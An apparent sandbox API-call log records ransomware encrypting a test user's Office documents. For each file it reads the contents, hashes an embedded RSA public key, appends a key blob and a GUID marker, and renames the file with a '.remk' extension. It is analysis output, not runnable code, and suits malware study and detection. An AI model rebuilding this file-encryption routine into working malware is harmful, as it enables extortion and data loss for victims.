0x37b5b70 [0231.794] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eJqlwVHiXQsxuhdL3.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ejqlwvhixqsxuhdl3.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eJqlwVHiXQsxuhdL3.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ejqlwvhixqsxuhdl3.xlsx.remk")) returned 1 [0231.796] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37c83b0, ftCreationTime.dwHighDateTime=0x1d5616f, ftLastAccessTime.dwLowDateTime=0xc59e3210, ftLastAccessTime.dwHighDateTime=0x1d57102, ftLastWriteTime.dwLowDateTime=0xc59e3210, ftLastWriteTime.dwHighDateTime=0x1d57102, nFileSizeHigh=0x0, nFileSizeLow=0x148c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F8JB21XeX O.pptx", cAlternateFileName="F8JB21~1.PPT")) returned 1 [0231.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.796] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8JB21XeX O.pptx") returned=".pptx" [0231.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8JB21XeX O.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8jb21xex o.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.798] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=84162) returned 1 [0231.798] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.800] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1489c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.801] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.803] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x148c2, lpOverlapped=0x0) returned 1 [0231.804] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.805] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.805] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.805] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.806] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.806] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.806] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.806] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.806] GetLastError () returned 0x0 [0231.806] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.806] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.806] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.806] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.806] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.807] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.808] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x148c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.808] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.808] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.808] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.808] CloseHandle (hObject=0x640) returned 1 [0231.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.819] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8JB21XeX O.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8jb21xex o.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8JB21XeX O.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8jb21xex o.pptx.remk")) returned 1 [0231.820] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89330210, ftCreationTime.dwHighDateTime=0x1d56243, ftLastAccessTime.dwLowDateTime=0xcd4bd160, ftLastAccessTime.dwHighDateTime=0x1d55dcb, ftLastWriteTime.dwLowDateTime=0xcd4bd160, ftLastWriteTime.dwHighDateTime=0x1d55dcb, nFileSizeHigh=0x0, nFileSizeLow=0x7382, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fcB8QhTtALgAbgf6S.xlsx", cAlternateFileName="FCB8QH~1.XLS")) returned 1 [0231.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.821] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fcB8QhTtALgAbgf6S.xlsx") returned=".xlsx" [0231.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fcB8QhTtALgAbgf6S.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fcb8qhttalgabgf6s.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.822] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=29570) returned 1 [0231.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.825] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x735c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.825] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.827] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x7382, lpOverlapped=0x0) returned 1 [0231.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.828] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.829] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.829] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.829] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.829] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.829] GetLastError () returned 0x0 [0231.829] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.829] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.829] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.829] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.829] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.830] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.830] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7382, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.830] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.831] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.831] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.831] CloseHandle (hObject=0x640) returned 1 [0231.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.834] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0231.834] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fcB8QhTtALgAbgf6S.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fcb8qhttalgabgf6s.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fcB8QhTtALgAbgf6S.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fcb8qhttalgabgf6s.xlsx.remk")) returned 1 [0231.836] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df39510, ftCreationTime.dwHighDateTime=0x1d579b5, ftLastAccessTime.dwLowDateTime=0x10d9a100, ftLastAccessTime.dwHighDateTime=0x1d58e55, ftLastWriteTime.dwLowDateTime=0x10d9a100, ftLastWriteTime.dwHighDateTime=0x1d58e55, nFileSizeHigh=0x0, nFileSizeLow=0x175d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HqNUeHlIrV_.docx", cAlternateFileName="HQNUEH~1.DOC")) returned 1 [0231.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.836] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HqNUeHlIrV_.docx") returned=".docx" [0231.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HqNUeHlIrV_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hqnuehlirv_.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.838] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=95696) returned 1 [0231.838] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.841] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x175aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.841] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.843] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x175d0, lpOverlapped=0x0) returned 1 [0231.845] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.845] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.845] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.845] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.846] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.846] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.846] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.846] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.846] GetLastError () returned 0x0 [0231.846] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.846] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.846] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.846] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.846] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.847] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.847] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x175d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.848] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.848] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.848] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.848] CloseHandle (hObject=0x640) returned 1 [0231.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.850] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HqNUeHlIrV_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hqnuehlirv_.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HqNUeHlIrV_.docx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hqnuehlirv_.docx.remk")) returned 1 [0231.852] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ade0130, ftCreationTime.dwHighDateTime=0x1d5bd82, ftLastAccessTime.dwLowDateTime=0x8d863940, ftLastAccessTime.dwHighDateTime=0x1d5bd8d, ftLastWriteTime.dwLowDateTime=0x8d863940, ftLastWriteTime.dwHighDateTime=0x1d5bd8d, nFileSizeHigh=0x0, nFileSizeLow=0x12f40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="htMWWgLGJ_E.xlsx", cAlternateFileName="HTMWWG~1.XLS")) returned 1 [0231.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0231.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0231.852] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\htMWWgLGJ_E.xlsx") returned=".xlsx" [0231.852] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\htMWWgLGJ_E.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\htmwwglgj_e.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.853] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=77632) returned 1 [0231.853] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, 